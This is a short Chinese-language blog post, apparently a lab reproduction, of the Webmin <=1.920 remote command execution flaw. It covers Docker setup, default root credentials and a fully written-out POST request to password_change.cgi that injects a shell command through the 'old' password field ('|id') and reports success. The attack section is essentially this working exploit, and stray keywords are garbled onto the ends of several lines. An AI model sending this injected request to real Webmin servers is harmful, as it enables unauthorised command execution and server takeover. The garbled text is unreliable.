0x00 前言html
原本前一阵就想复现来着,可是官网的版本已经更新了,直到今天才发现Docker上有环境,才进行了复现web
0x01影响版本docker
Webmin<=1.920
app
0x02 环境搭建spa
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba
访问你的ip:10000便可访问1.920版本的webmin
code
使用帐号密码:root/webmin登陆到后台
orm
开启密码重置功能:htm
Webmin--Webmin confuration--Authenticationblog
0x03 漏洞利用接口
通过长时间的寻找,未找到修改密码的接口,因此随便抓个包手动构造了一个,数据包以下:
POST /password_change.cgi HTTP/1.1 Host: 136.244.xx.xx:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1 X-PJAX: true X-PJAX-Container: [data-dcontainer] X-PJAX-URL: passwd/edit_passwd.cgi?user=root X-Requested-From: passwd X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Type: text/plain;charset=UTF-8 Content-Length: 49DNT: 1 Connection: close user=laemon&old=123123|id&new1=123456&new2=123456
最终执行命令成功
参考文章:
https://paper.seebug.org/1019/
更多最新复现内容,请关注公众号Timeline Sec